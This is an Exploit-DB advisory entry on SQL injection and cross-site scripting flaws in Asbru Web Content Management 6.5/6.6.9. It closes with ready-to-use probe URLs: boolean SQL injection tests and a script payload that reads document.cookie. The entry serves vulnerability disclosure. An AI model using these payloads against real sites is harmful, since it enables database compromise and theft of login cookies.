Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting

EDB-ID:

32888

CVE:

N/A




Platform:

ASP

Date:

2009-04-02


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/34349/info

Asbru Web Content Management is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Asbru Web Content Management 6.5 and 6.6.9 are vulnerable; other versions may also be affected. 

http://www.example.com/page.asp?id=1         
http://www.example.com/page.asp?id=1 AND 1=2 
http://www.example.com/page.asp?id=1 AND 1=1 
http://www.example.com/webadmin/login.asp?url="><script>alert(document.cookie)</script>